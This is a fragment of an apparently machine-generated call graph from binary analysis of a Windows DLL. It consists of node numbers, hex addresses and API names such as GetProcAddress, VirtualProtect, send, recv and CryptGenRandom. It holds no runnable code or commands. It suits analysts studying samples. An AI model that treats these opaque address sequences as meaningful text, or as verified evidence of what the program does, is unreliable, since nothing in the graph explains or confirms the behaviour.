__DllMainCRTStartup@12 126276->126297 126278->126246 126298 6fe4c770 HeapFree 126278->126298 126280 6fe7ed22 126279->126280 126280->126270 126283 6fe7eee6 126280->126283 126301 6fea5450 33 API calls __DllMainCRTStartup@12 126283->126301 126286->126197 126287->126244 126288->126239 126289->126239 126293->126255 126294->126246 126297->126278 126298->126246 126303->126216 126306 6fe41203 126305->126306 126307 6fe411fc 126305->126307 126306->126307 126311 6fea55d0 33 API calls __DllMainCRTStartup@12 126306->126311 126307->126147 126315 6fe432d0 126312->126315 126316 6fe43393 126315->126316 126318 6fe4339f 126315->126318 126345 6fe45dd0 40 API calls 126316->126345 126323 6fe43405 126318->126323 126346 6fe4c000 35 API calls __DllMainCRTStartup@12 126318->126346 126320 6fe74490 33 API calls 126324 6fe43473 126320->126324 126321 6fe43459 126347 6fe42130 33 API calls __DllMainCRTStartup@12 126321->126347 126323->126320 126325 6fe4c330 __DllMainCRTStartup@12 33 API calls 126324->126325 126326 6fe435cb 126325->126326 126327 6fe75be0 33 API calls 126326->126327 126330 6fe43680 126327->126330 126328 6fe75be0 33 API calls 126329 6fe436f9 126328->126329 126331 6fe45e70 HeapFree 126329->126331 126330->126328 126332 6fe4372a 126331->126332 126333 6fe4380f 126332->126333 126348 6fe74060 35 API calls __DllMainCRTStartup@12 126332->126348 126335 6fe4c330 __DllMainCRTStartup@12 33 API calls 126333->126335 126336 6fe43856 126335->126336 126337 6fe48630 __DllMainCRTStartup@12 33 API calls 126336->126337 126338 6fe438bd 126337->126338 126339 6fe7d570 36 API calls 126338->126339 126340 6fe43934 126339->126340 126341 6fe46a50 34 API calls 126340->126341 126344 6fe42e2e 126340->126344 126342 6fe43a2c 126341->126342 126343 6fe6a0f0 __DllMainCRTStartup@12 33 API calls 126342->126343 126343->126344 126344->126154 126345->126318 126346->126321 126347->126323 126348->126333 126362 6fe7d840 WaitForSingleObject 126349->126362 126351 6fe42ba9 126352 6fe42be4 126351->126352 126353 6fe42bcc 126351->126353 126354 6fe42be2 126352->126354 126355 6fe42c3c 126352->126355 126369 6fea5590 33 API calls __DllMainCRTStartup@12 126353->126369 126370 6fea5590 33 API calls __DllMainCRTStartup@12 126354->126370 126358 6fe6a0f0 __DllMainCRTStartup@12 33 API calls 126355->126358 126359 6fe42c74 126358->126359 126360 6fe46a50 34 API calls 126359->126360 126361 6fe42c8c 126360->126361 126361->126140 126361->126174 126363 6fe7d896 GetLastError 126362->126363 126364 6fe7d87e CloseHandle 126362->126364 126371 6fea55d0 33 API calls __DllMainCRTStartup@12 126363->126371 126364->126351 126373 6fe41031 126372->126373 126374 6fe41093 126372->126374 126373->126374 126376 6fea55d0 33 API calls __DllMainCRTStartup@12 126373->126376 126374->126140 126377 6fe67730 126381 6fe67990 126377->126381 126383 6fe67998 33 API calls __DllMainCRTStartup@12 126381->126383 126384 6fe9bdbf 126385 6fe9bdc8 126384->126385 126386 6fe9bdfa 126384->126386 126390 6fe9a9fb 126385->126390 126391 6fe9aa06 126390->126391 126394 6fe9aa0c 126390->126394 126438 6fe98afd 6 API calls __dosmaperr 126391->126438 126396 6fe9aa12 126394->126396 126439 6fe98b3c 126394->126439 126397 6fe9aa17 126396->126397 126447 6fe98364 41 API calls __CreateFrameInfo 126396->126447 126415 6fe9bbca 126397->126415 126398 6fe987eb __dosmaperr 14 API calls 126400 6fe9aa36 126398->126400 126402 6fe9aa3e 126400->126402 126403 6fe9aa53 126400->126403 126405 6fe98b3c __dosmaperr 6 API calls 126402->126405 126404 6fe98b3c __dosmaperr 6 API calls 126403->126404 126406 6fe9aa5f 126404->126406 126407 6fe9aa4a 126405->126407 126408 6fe9aa63 126406->126408 126409 6fe9aa72 126406->126409 126444 6fe98848 14 API calls __dosmaperr 126407->126444 126410 6fe98b3c __dosmaperr 6 API calls 126408->126410 126445 6fe9a742 14 API calls __dosmaperr 126409->126445 126410->126407 126413 6fe9aa7d 126446 6fe98848 14 API calls __dosmaperr 126413->126446 126456 6fe9bd1f 126415->126456 126420 6fe9bc0d 126420->126386 126423 6fe9bc34 126483 6fe9be1a 126423->126483 126424 6fe9bc26 126494 6fe98848 14 API calls __dosmaperr 126424->126494 126428 6fe9bc6c 126495 6fe987d8 14 API calls __dosmaperr 126428->126495 126430 6fe9bc71 126496 6fe98848 14 API calls __dosmaperr 126430->126496 126431 6fe9bc87 126432 6fe9bcb3 126431->126432 126497 6fe98848 14 API calls __dosmaperr 126431->126497 126433 6fe9bcfc 126432->126433 126498 6fe9b843 41 API calls 2 library calls 126432->126498 126499 6fe98848 14 API calls __dosmaperr 126433->126499 126438->126394 126448 6fe9899b 126439->126448 126442 6fe98b76 TlsSetValue 126443 6fe98b61 126443->126396 126443->126398 126444->126396 126445->126413 126446->126397 126449 6fe989cb 126448->126449 126452 6fe989c7 126448->126452 126449->126452 126455 6fe988d0 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary ___vcrt_FlsFree 126449->126455 126451 6fe989df 126451->126452 126453 6fe989e5 GetProcAddress 126451->126453 126452->126442 126452->126443 126453->126452 126454 6fe989f5 __dosmaperr 126453->126454 126454->126452 126455->126451 126457 6fe9bd2b __FrameHandler3::FrameUnwindToState 126456->126457 126459 6fe9bd45 126457->126459 126500 6fe9ad0c EnterCriticalSection 126457->126500 126461 6fe9bbf4 126459->126461 126503 6fe98364 41 API calls __CreateFrameInfo 126459->126503 126460 6fe9bd81 126502 6fe9bd9e LeaveCriticalSection __CreateFrameInfo 126460->126502 126467 6fe9b951 126461->126467 126464 6fe9bd55 126464->126460 126501 6fe98848 14 API calls __dosmaperr 126464->126501 126504 6fe9b417 126467->126504 126470 6fe9b972 GetOEMCP 126472 6fe9b99b 126470->126472 126471 6fe9b984 126471->126472 126473 6fe9b989 GetACP 126471->126473 126472->126420 126474 6fe993ef 126472->126474 126473->126472 126475 6fe9942d 126474->126475 126476 6fe993fd 126474->126476 126516 6fe987d8 14 API calls __dosmaperr 126475->126516 126477 6fe99418 HeapAlloc 126476->126477 126481 6fe99401 __dosmaperr 126476->126481 126479 6fe9942b 126477->126479 126477->126481 126480 6fe99432 126479->126480 126480->126423 126480->126424 126481->126475 126481->126477 126515 6fe9c504 EnterCriticalSection LeaveCriticalSection __dosmaperr 126481->126515 126484 6fe9b951 43 API calls 126483->126484 126485 6fe9be3a 126484->126485 126487 6fe9be77 IsValidCodePage 126485->126487 126492 6fe9bf3f 126485->126492 126493 6fe9be92 __CreateFrameInfo 126485->126493 126489 6fe9be89 126487->126489 126487->126492 126488 6fe9bc61 126488->126428 126488->126431 126490 6fe9beb2 GetCPInfo 126489->126490 126489->126493 126490->126492 126490->126493 126528 6fe90c5b 126492->126528 126517 6fe9ba25 126493->126517 126494->126420 126495->126430 126496->126420 126497->126432 126498->126433 126499->126420 126500->126464 126501->126460 126502->126459 126505 6fe9b435 126504->126505 126506 6fe9b42e 126504->126506 126505->126506 126512 6fe9a940 41 API calls 3 library calls 126505->126512 126506->126470 126506->126471 126508 6fe9b456 126513 6fe9970f 41 API calls _fread 126508->126513 126510 6fe9b46c 126514 6fe9976d 41 API calls _fread 126510->126514 126512->126508 126513->126510 126514->126506 126515->126481 126516->126480 126518 6fe9ba4d GetCPInfo 126517->126518 126527 6fe9bb16 126517->126527 126524 6fe9ba65 126518->126524 126518->126527 126520 6fe90c5b _ValidateLocalCookies 5 API calls 126522 6fe9bbc8 126520->126522 126522->126492 126535 6fea089e 126524->126535 126526 6fea1243 46 API calls 126526->126527 126527->126520 126529 6fe90c63 126528->126529 126530 6fe90c64 IsProcessorFeaturePresent 126528->126530 126529->126488 126532 6fe91335 126530->126532 126606 6fe912f8 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 126532->126606 126534 6fe91418 126534->126488 126536 6fe9b417 41 API calls 126535->126536 126537 6fea08be 126536->126537 126555 6fe9c1bc 126537->126555 126539 6fea097a 126542 6fe90c5b _ValidateLocalCookies 5 API calls 126539->126542 126540 6fea0972 126558 6fea099f 14 API calls ___free_lconv_mon 126540->126558 126541 6fea08eb 126541->126539 126541->126540 126544 6fe993ef 15 API calls 126541->126544 126546 6fea0910 __CreateFrameInfo 126541->126546 126545 6fe9bacd 126542->126545 126544->126546 126550 6fea1243 126545->126550 126546->126540 126547 6fe9c1bc ___scrt_uninitialize_crt MultiByteToWideChar 126546->126547 126548 6fea0959 126547->126548 126548->126540 126549 6fea0960 GetStringTypeW 126548->126549 126549->126540 126551 6fe9b417 41 API calls 126550->126551 126552 6fea1256 126551->126552 126561 6fea1054 126552->126561 126559 6fe9c124 126555->126559 126558->126539 126560 6fe9c135 MultiByteToWideChar 126559->126560 126560->126541 126562 6fea106f 126561->126562 126563 6fe9c1bc ___scrt_uninitialize_crt MultiByteToWideChar 126562->126563 126564 6fea10b3 126563->126564 126566 6fea1181 126564->126566 126568 6fe993ef 15 API calls 126564->126568 126570 6fea10d9 126564->126570 126571 6fea122e 126564->126571 126565 6fe90c5b _ValidateLocalCookies 5 API calls 126567 6fe9baee 126565->126567 126601 6fea099f 14 API calls ___free_lconv_mon 126566->126601 126567->126526 126568->126570 126570->126566 126572 6fe9c1bc ___scrt_uninitialize_crt MultiByteToWideChar 126570->126572 126571->126565 126573 6fea1122 126572->126573 126573->126566 126589 6fe98bc9 126573->126589 126576 6fea1158 126576->126566 126579 6fe98bc9 7 API calls 126576->126579 126577 6fea1190 126578 6fea1219 126577->126578 126580 6fe993ef 15 API calls 126577->126580 126582 6fea11a2 126577->126582 126600 6fea099f 14 API calls ___free_lconv_mon 126578->126600 126579->126566 126580->126582 126582->126578 126583 6fe98bc9 7 API calls 126582->126583 126584 6fea11e5 126583->126584 126584->126578 126598 6fe9c276 WideCharToMultiByte ___scrt_uninitialize_crt 126584->126598 126586 6fea11ff 126586->126578 126587 6fea1208 126586->126587 126599 6fea099f 14 API calls ___free_lconv_mon 126587->126599 126602 6fe9889c 126589->126602 126592 6fe98bda LCMapStringEx 126597 6fe98c21 126592->126597 126593 6fe98c01 126605 6fe98c26 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 126593->126605 126595 6fe98c1a LCMapStringW 126595->126597 126597->126566 126597->126576 126597->126577 126598->126586 126599->126566 126600->126566 126601->126571 126603 6fe9899b __dosmaperr 5 API calls 126602->126603 126604 6fe988b2 126603->126604 126604->126592 126604->126593 126605->126595 126606->126534 126607 6fe66970 126610 6fe669d0 126607->126610 126613 6fe66520 126610->126613 126614 6fe66560 126613->126614 126615 6fe6656d 126613->126615 126620 6fea5590 33 API calls __DllMainCRTStartup@12 126614->126620 126619 6fe67810 GetNativeSystemInfo 126615->126619 126618 6fe66572 126619->126618 126641 6fe50a00 126644 6fe4ef00 126641->126644 126645 6fe4ef63 __DllMainCRTStartup@12 126644->126645 126646 6fea4f70 __DllMainCRTStartup@12 37 API calls 126645->126646 126647 6fe4efae 126645->126647 126646->126647 126648 1000c7a7 126649 1000c7be 126648->126649 126655 1000c82c 126648->126655 126649->126655 126660 1000c7e6 GetModuleHandleA 126649->126660 126651 1000c872 126652 1000c835 GetModuleHandleA 126653 1000c83f 126652->126653 126653->126653 126653->126655 126656 1000c85f GetProcAddress 126653->126656 126655->126651 126655->126652 126655->126653 126656->126655 126661 1000c7ef 126660->126661 126667 1000c82c 126660->126667 126672 1000c803 GetProcAddress 126661->126672 126664 1000c872 126665 1000c835 GetModuleHandleA 126669 1000c83f 126665->126669 126667->126664 126667->126665 126667->126669 126669->126667 126671 1000c85f GetProcAddress 126669->126671 126671->126667 126673 1000c82c 126672->126673 126674 1000c80d VirtualProtect 126672->126674 126676 1000c872 126673->126676 126677 1000c835 GetModuleHandleA 126673->126677 126674->126673 126675 1000c81c VirtualProtect 126674->126675 126675->126673 126679 1000c83f 126677->126679 126678 1000c85f GetProcAddress 126678->126679 126679->126673 126679->126678 126680 6fe908c3 126681 6fe908ce 126680->126681 126682 6fe90901 126680->126682 126683 6fe908f3 126681->126683 126684 6fe908d3 126681->126684 126708 6fe90a1d 147 API calls 4 library calls 126682->126708 126692 6fe90916 126683->126692 126686 6fe908e9 126684->126686 126687 6fe908d8 126684->126687 126707 6fe90f05 23 API calls 126686->126707 126690 6fe908dd 126687->126690 126706 6fe90f24 21 API calls 126687->126706 126693 6fe90922 __FrameHandler3::FrameUnwindToState 126692->126693 126709 6fe90f95 126693->126709 126695 6fe90929 __DllMainCRTStartup@12 126696 6fe90950 126695->126696 126697 6fe90a15 126695->126697 126704 6fe9098c ___scrt_is_nonwritable_in_current_image __CreateFrameInfo 126695->126704 126717 6fe90ef7 126696->126717 126722 6fe91134 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter __CreateFrameInfo 126697->126722 126700 6fe90a1c 126701 6fe9095f __RTC_Initialize 126701->126704 126720 6fe90e1b InitializeSListHead 126701->126720 126703 6fe9096d 126703->126704 126721 6fe90ecc IsProcessorFeaturePresent ___scrt_release_startup_lock 126703->126721 126704->126690 126706->126690 126707->126690 126708->126690 126710 6fe90f9e 126709->126710 126723 6fe9141f IsProcessorFeaturePresent 126710->126723 126712 6fe90faa 126724 6fe93f0d 10 API calls 2 library calls 126712->126724 126714 6fe90faf 126715 6fe90fb3 126714->126715 126725 6fe93f3f 7 API calls 2 library calls 126714->126725 126715->126695 126726 6fe90fce 126717->126726 126719 6fe90efe 126719->126701 126720->126703 126721->126704 126722->126700 126723->126712 126724->126714 126725->126715 126727 6fe90fda 126726->126727 126728 6fe90fde 126726->126728 126727->126719 126731 6fe90feb ___scrt_release_startup_lock 126728->126731 126732 6fe91134 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter __CreateFrameInfo 126728->126732 126730 6fe91054 126731->126719 126732->126730 126733 6fe90c03 126734 6fe90c0c 126733->126734 126735 6fe90c11 126733->126735 126754 6fe90dd0 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 126734->126754 126739 6fe90acd 126735->126739 126740 6fe90ad9 __FrameHandler3::FrameUnwindToState 126739->126740 126741 6fe90ae8 126740->126741 126742 6fe90b02 dllmain_raw 126740->126742 126743 6fe90afd 126740->126743 126742->126741 126744 6fe90b1c dllmain_crt_dispatch 126742->126744 126755 6fe4a0a0 126743->126755 126744->126741 126744->126743 126747 6fe90b6e 126747->126741 126748 6fe90b77 dllmain_crt_dispatch 126747->126748 126748->126741 126750 6fe90b8a dllmain_raw 126748->126750 126749 6fe4a0a0 __DllMainCRTStartup@12 64 API calls 126751 6fe90b55 126749->126751 126750->126741 126774 6fe90a1d 147 API calls 4 library calls 126751->126774 126753 6fe90b63 dllmain_raw 126753->126747 126754->126735 126756 6fe4a0e5 GetProcAddress 126755->126756 126773 6fe4a16a 126755->126773 126775 6fe4a9a0 126756->126775 126759 6fe4a14e 126785 6fe4af50 49 API calls __DllMainCRTStartup@12 126759->126785 126761 6fe4a168 126786 6fe4a650 63 API calls __DllMainCRTStartup@12 126761->126786 126763 6fe4a20a 126787 6fe4b030 49 API calls __DllMainCRTStartup@12 126763->126787 126765 6fe4a226 126788 6fe57190 HeapFree __DllMainCRTStartup@12 126765->126788 126767 6fe4a234 126789 6fe462c0 HeapFree __DllMainCRTStartup@12 126767->126789 126769 6fe4a249 126790 6fe57190 HeapFree __DllMainCRTStartup@12 126769->126790 126771 6fe4a25e 126791 6fe465e0 HeapFree __DllMainCRTStartup@12 126771->126791 126773->126747 126773->126749 126774->126753 126792 6fe47c70 126775->126792 126777 6fe4ab28 __DllMainCRTStartup@12 126777->126759 126778 6fe4aa18 __DllMainCRTStartup@12 126778->126777 126779 6fe4c330 __DllMainCRTStartup@12 33 API calls 126778->126779 126780 6fe4aa8a __DllMainCRTStartup@12 126779->126780 126781 6fe4ab98 126780->126781 126783 6fe4abe8 __DllMainCRTStartup@12 126780->126783 126796 6fe4ae20 33 API calls __DllMainCRTStartup@12 126781->126796 126797 6fe46550 49 API calls __DllMainCRTStartup@12 126783->126797 126785->126761 126786->126763 126787->126765 126788->126767 126789->126769 126790->126771 126791->126773 126793 6fe47c93 __DllMainCRTStartup@12 126792->126793 126798 6fe5f180 126793->126798 126795 6fe47cbb __DllMainCRTStartup@12 126795->126778 126796->126777 126797->126777 126799 6fe5f1e0 __DllMainCRTStartup@12 126798->126799 126807 6fe5f2ef __DllMainCRTStartup@12 126799->126807 126850 6fe58800 126799->126850 126804 6fe5f24c 126860 6fe60480 43 API calls __DllMainCRTStartup@12 126804->126860 126807->126795 126808 6fe5f28f __DllMainCRTStartup@12 126811 6fe5f37d __DllMainCRTStartup@12 126808->126811 126814 6fe5f365 __DllMainCRTStartup@12 126808->126814 126861 6fe60480 43 API calls __DllMainCRTStartup@12 126808->126861 126811->126814 126863 6fe53010 40 API calls __DllMainCRTStartup@12 126811->126863 126813 6fe5f545 __DllMainCRTStartup@12 126813->126814 126815 6fe5f647 __DllMainCRTStartup@12 126813->126815 126862 6fe572e0 34 API calls __DllMainCRTStartup@12 126814->126862 126816 6fe5f6ac 126815->126816 126864 6fe5a760 126815->126864 126824 6fe5f867 __DllMainCRTStartup@12 126816->126824 126874 6fe56b20 HeapFree __DllMainCRTStartup@12 126816->126874 126819 6fe5f765 __DllMainCRTStartup@12 126820 6fe5f799 126819->126820 126822 6fe5f811 __DllMainCRTStartup@12 126819->126822 126871 6fe56b20 HeapFree __DllMainCRTStartup@12 126820->126871 126872 6fe56b20 HeapFree __DllMainCRTStartup@12 126822->126872 126875 6fe60580 45 API calls __DllMainCRTStartup@12 126824->126875 126825 6fe5f87f 126873 6fe56d10 HeapFree __DllMainCRTStartup@12 126825->126873 126828 6fe5f970 __DllMainCRTStartup@12 126829 6fe5fa47 __DllMainCRTStartup@12 126828->126829 126832 6fe5f9a9 __DllMainCRTStartup@12 126828->126832 126882 6fe57110 34 API calls __DllMainCRTStartup@12 126829->126882 126831 6fe5fd55 126883 6fe56d10 HeapFree __DllMainCRTStartup@12 126831->126883 126833 6fe5a760 __DllMainCRTStartup@12 59 API calls 126832->126833 126837 6fe5facf __DllMainCRTStartup@12 126833->126837 126835 6fe5fd6d 126884 6fe572e0 34 API calls __DllMainCRTStartup@12 126835->126884 126838 6fe5fb03 __DllMainCRTStartup@12 126837->126838 126839 6fe5fb65 __DllMainCRTStartup@12 126837->126839 126876 6fe56d10 HeapFree __DllMainCRTStartup@12 126838->126876 126878 6fe572d0 HeapFree __DllMainCRTStartup@12 126839->126878 126841 6fe5fcf6 126879 6fe57110 34 API calls __DllMainCRTStartup@12 126841->126879 126843 6fe5fcae 126877 6fe572e0 34 API calls __DllMainCRTStartup@12 126843->126877 126845 6fe5fd0e 126880 6fe56d10 HeapFree __DllMainCRTStartup@12 126845->126880 126848 6fe5fd26 126881 6fe572e0 34 API calls __DllMainCRTStartup@12 126848->126881 126885 6fe59960 126850->126885 126853 6fe5b970 126854 6fe5b9d1 __DllMainCRTStartup@12 126853->126854 126855 6fe5b9f1 126854->126855 126911 6fea4ec0 WaitOnAddress GetLastError 126854->126911 126908 6fe5ba20 126855->126908 126858 6fe5ba13 126858->126804 126859 6fea58e0 33 API calls __DllMainCRTStartup@12 126858->126859 126860->126808 126861->126811 126862->126807 126863->126813 126917 6fe52340 126864->126917 126870 6fe5a7d4 126870->126819 126871->126816 126872->126825 126873->126816 126874->126824 126875->126828 126876->126843 126877->126807 126878->126841 126879->126845 126880->126848 126881->126807 126882->126831 126883->126835 126884->126807 126888 6fe59a10 126885->126888 126891 6fe59a90 126888->126891 126901 6fe59bc0 126891->126901 126895 6fe59b2e __DllMainCRTStartup@12 126896 6fe59b4f 126895->126896 126897 6fe59b6e 126895->126897 126906 6fea56a0 33 API calls __DllMainCRTStartup@12 126896->126906 126907 6fe59a80 33 API calls __DllMainCRTStartup@12 126897->126907 126900 6fe5880d 126900->126853 126902 6fe59bd3 __DllMainCRTStartup@12 126901->126902 126903 6fe59ae3 126902->126903 126904 6fe59a80 __DllMainCRTStartup@12 33 API calls 126902->126904 126903->126900 126905 6fe596e0 35 API calls __DllMainCRTStartup@12 126903->126905 126904->126903 126905->126895 126907->126900 126912 6fe4f2e0 126908->126912 126910 6fe5ba43 __DllMainCRTStartup@12 126910->126858 126911->126855 126913 6fe4f31e __DllMainCRTStartup@12 126912->126913 126915 6fe4f328 __DllMainCRTStartup@12 126913->126915 126916 6fea4c50 33 API calls __DllMainCRTStartup@12 126913->126916 126915->126910 126916->126915 126933 6fe62880 126917->126933 126919 6fe5234f __DllMainCRTStartup@12 126936 6fe657c0 126919->126936 126922 6fe5edb0 126923 6fe5ee02 __DllMainCRTStartup@12 126922->126923 126958 6fe5b8c0 33 API calls __DllMainCRTStartup@12 126923->126958 126925 6fe5ee11 126927 6fe5ee54 __DllMainCRTStartup@12 126925->126927 126964 6fea58e0 33 API calls __DllMainCRTStartup@12 126925->126964 126959 6fe59c00 126927->126959 126929 6fe5eea2 __DllMainCRTStartup@12 126965 6fe562e0 34 API calls __DllMainCRTStartup@12 126929->126965 126931 6fe5a7b0 126932 6fe57d70 35 API calls __DllMainCRTStartup@12 126931->126932 126932->126870 126942 6fe579c0 126933->126942 126937 6fe65846 126936->126937 126939 6fe52371 126936->126939 126956 6fe4f6f0 33 API calls __DllMainCRTStartup@12 126937->126956 126939->126922 126941 6fe65883 126941->126939 126957 6fe52380 33 API calls __DllMainCRTStartup@12 126941->126957 126949 6fe50630 126942->126949 126944 6fe57a20 126947 6fe57a8b 126944->126947 126954 6fea56f0 33 API calls __DllMainCRTStartup@12 126944->126954 126947->126919 126950 6fe50653 126949->126950 126951 6fe5064c 126949->126951 126950->126951 126952 6fea55d0 __DllMainCRTStartup@12 33 API calls 126950->126952 126951->126944 126955 6fea5be0 33 API calls __DllMainCRTStartup@12 126951->126955 126953 6fe50715 126952->126953 126956->126941 126957->126941 126958->126925 126966 6fe5a0d0 36 API calls __DllMainCRTStartup@12 126959->126966 126961 6fe59c8f 126967 6fe58360 126961->126967 126963 6fe59ccb 126963->126929 126965->126931 126966->126961 126968 6fe58394 __DllMainCRTStartup@12 126967->126968 126969 6fe583ce 126967->126969 126968->126963 126971 6fe59ce0 126969->126971 126972 6fe5a310 __DllMainCRTStartup@12 56 API calls 126971->126972 126973 6fe59d67 126972->126973 126974 6fe581f0 __DllMainCRTStartup@12 36 API calls 126973->126974 126975 6fe59d95 126974->126975 126976 6fe568a0 __DllMainCRTStartup@12 HeapFree 126975->126976 126977 6fe59daa 126976->126977 126977->126968 126978 848e5 126979 848fa 126978->126979 126992 8498c 126978->126992 126980 84908 126979->126980 126981 7cbde 2 API calls 126979->126981 126982 849bc 126980->126982 126983 84a1c 126980->126983 126984 84947 126980->126984 126985 84a43 126980->126985 126988 849f1 126980->126988 126980->126992 126994 8497c 126980->126994 126996 82ef9 126980->126996 126981->126980 126982->126988 126990 7dd35 56 API calls 126982->126990 126982->126992 126983->126985 126983->126992 127022 83ab5 126983->127022 126984->126992 126984->126994 127004 7dd35 126984->127004 126985->126992 127030 8407f 126985->127030 126988->126983 127018 836e2 126988->127018 126990->126982 126994->126982 126994->126992 126995 82ef9 51 API calls 126994->126995 126995->126982 126997 82f0b 126996->126997 126998 82f15 126996->126998 126997->126984 127040 81969 126998->127040 127000 82f38 127000->126997 127002 82fb8 ctype 127000->127002 127044 90ed1 127000->127044 127002->126997 127003 7cbde 2 API calls 127002->127003 127003->126997 127008 7dd4f 127004->127008 127005 7dda2 127005->126984 127007 7dc3d WSAGetLastError recv 127007->127008 127008->127005 127008->127007 127009 7e1d4 127008->127009 127011 7e1cd 127008->127011 127012 7e211 127008->127012 127101 84734 127008->127101 127111 7ce66 WSAGetLastError send EnterCriticalSection 127008->127111 127112 82cbb WSAGetLastError send EnterCriticalSection 127008->127112 127113 7db17 WSAGetLastError send EnterCriticalSection 127008->127113 127114 7e4f8 WSAGetLastError send EnterCriticalSection 127009->127114 127116 7e4f8 WSAGetLastError send EnterCriticalSection 127011->127116 127115 7e4f8 WSAGetLastError send EnterCriticalSection 127012->127115 127020 83711 127018->127020 127019 83734 127019->126983 127020->127019 127021 7cbde 2 API calls 127020->127021 127021->127020 127023 83ae4 127022->127023 127025 83add 127022->127025 127023->127025 127228 7e78b 46 API calls 127023->127228 127025->126985 127026 83b3c 127026->127025 127028 83c47 127026->127028 127229 7bcad 49 API calls 127026->127229 127028->127025 127029 7cbde 2 API calls 127028->127029 127029->127025 127032 8409a 127030->127032 127031 84121 127031->126992 127032->127031 127037 84180 127032->127037 127230 7fb8b QueryPerformanceFrequency QueryPerformanceCounter EnterCriticalSection LeaveCriticalSection ctype 127032->127230 127034 7cbde 2 API calls 127034->127031 127036 841da 127036->127031 127036->127034 127037->127031 127039 841b7 127037->127039 127231 7ec8b CryptAcquireContextA CryptGenRandom CryptReleaseContext 127037->127231 127039->127031 127039->127036 127232 7ec8b CryptAcquireContextA CryptGenRandom CryptReleaseContext 127039->127232 127042 8197c 127040->127042 127041 81a70 127041->127000 127042->127041 127048 813c1 127042->127048 127045 90ee6 127044->127045 127047 90f01 127044->127047 127046 91181 3 API calls 127045->127046 127045->127047 127046->127047 127047->127002 127049 813de 127048->127049 127050 81403 127049->127050 127052 80c77 127049->127052 127050->127041 127053 80c89 127052->127053 127054 80c82 127052->127054 127055 80c8e 127053->127055 127058 80b6d 127053->127058 127054->127050 127055->127050 127057 80ca6 127057->127050 127060 80b8a 127058->127060 127059 80b94 127059->127057 127060->127059 127062 8b95c 127060->127062 127063 8b996 127062->127063 127066 8ba04 127062->127066 127063->127066 127070 89f9a 127063->127070 127065 8b9d1 127065->127066 127082 8b746 127065->127082 127066->127059 127068 8b9ef 127068->127066 127085 8b7b8 127068->127085 127071 89fae 127070->127071 127080 8a05b 127070->127080 127072 89fe7 127071->127072 127071->127080 127091 89f56 46 API calls 127071->127091 127074 8a004 127072->127074 127092 89f56 46 API calls 127072->127092 127075 8a021 127074->127075 127093 89f56 46 API calls 127074->127093 127078 8a03e 127075->127078 127094 89f56 46 API calls 127075->127094 127078->127080 127095 89f56 46 API calls 127078->127095 127080->127065 127083 90ed1 3 API calls 127082->127083 127084 8b75a 127083->127084 127084->127068 127086 8b7f7 127085->127086 127088 8b7ed 127085->127088 127087 89f9a 46 API calls 127086->127087 127089 8b804 127086->127089 127087->127089 127088->127066 127089->127088 127096 8b191 127089->127096 127091->127072 127092->127074 127093->127075 127094->127078 127095->127080 127098 8b1aa 127096->127098 127099 8b241 127096->127099 127098->127099 127100 8ac06 CryptAcquireContextA CryptGenRandom CryptReleaseContext 127098->127100 127099->127088 127100->127099 127102 8479e 127101->127102 127103 84751 127101->127103 127105 8485b ctype 127102->127105 127106 84782 127102->127106 127104 8476d 127103->127104 127103->127106 127146 7e4f8 WSAGetLastError send EnterCriticalSection 127104->127146 127109 8449d 54 API calls 127105->127109 127110 84777 ctype 127105->127110 127106->127110 127117 8449d 127106->127117 127109->127110 127110->127008 127111->127008 127112->127008 127113->127008 127114->127005 127115->127005 127116->127005 127120 844c7 127117->127120 127144 844bd 127117->127144 127118 8452c 127150 7e4f8 WSAGetLastError send EnterCriticalSection 127118->127150 127120->127118 127121 84540 127120->127121 127122 84548 127121->127122 127123 845c1 127121->127123 127124 8454a 127122->127124 127125 845b1 127122->127125 127126 84601 127123->127126 127127 845c6 127123->127127 127129 84550 127124->127129 127130 84594 127124->127130 127153 83384 49 API calls ___scrt_fastfail 127125->127153 127156 83d3b 52 API calls ctype 127126->127156 127132 845ea 127127->127132 127133 845cb 127127->127133 127137 8455b 127129->127137 127138 84573 127129->127138 127142 8456e 127129->127142 127152 83094 52 API calls _memcmp 127130->127152 127155 83f5c 6 API calls _memcmp 127132->127155 127133->127144 127154 842b2 WSAGetLastError send CryptAcquireContextA CryptGenRandom CryptReleaseContext 127133->127154 127137->127144 127147 83cf5 127137->127147 127151 8330a 49 API calls 127138->127151 127143 846b2 127142->127143 127157 7e4f8 WSAGetLastError send EnterCriticalSection 127142->127157 127143->127144 127158 7ec8b CryptAcquireContextA CryptGenRandom CryptReleaseContext 127143->127158 127144->127110 127146->127110 127159 7d367 127147->127159 127149 83d07 127149->127142 127150->127144 127151->127142 127152->127142 127153->127142 127154->127142 127155->127142 127156->127142 127157->127143 127158->127144 127160 7d3ab ___scrt_fastfail 127159->127160 127161 7d3b5 127160->127161 127162 7d599 127160->127162 127178 81f55 49 API calls 127160->127178 127161->127149 127171 7d5eb ctype ___scrt_fastfail 127162->127171 127179 7d056 WSAGetLastError send EnterCriticalSection 127162->127179 127164 7d78b 127164->127161 127168 7d7c8 127164->127168 127192 7d252 52 API calls 127164->127192 127168->127161 127170 7d932 127168->127170 127172 7d941 127168->127172 127173 7d928 127168->127173 127170->127161 127195 7d056 WSAGetLastError send EnterCriticalSection 127170->127195 127171->127161 127171->127164 127180 7d252 52 API calls 127171->127180 127181 7f4f4 127171->127181 127191 7d056 WSAGetLastError send EnterCriticalSection 127171->127191 127194 7cf54 46 API calls swprintf 127172->127194 127193 7cffc 46 API calls 127173->127193 127178->127160 127179->127171 127180->127171 127182 7f522 127181->127182 127183 7f511 127181->127183 127196 88afd 127182->127196 127183->127171 127185 7f544 127185->127183 127199 7f3b6 EnterCriticalSection LeaveCriticalSection 127185->127199 127187 7f5bd 127187->127183 127200 91ab7 EnterCriticalSection 127187->127200 127189 7f6b6 127189->127183 127201 91ac1 LeaveCriticalSection 127189->127201 127191->127171 127192->127168 127193->127170 127194->127170 127195->127161 127202 88b93 127196->127202 127198 88b14 ctype 127198->127185 127199->127187 127200->127189 127201->127183 127203 88bb3 127202->127203 127205 88ba9 127202->127205 127215 88d68 127203->127215 127216 8778d 127203->127216 127205->127198 127207 88e44 127207->127205 127223 87bca 46 API calls _memcmp 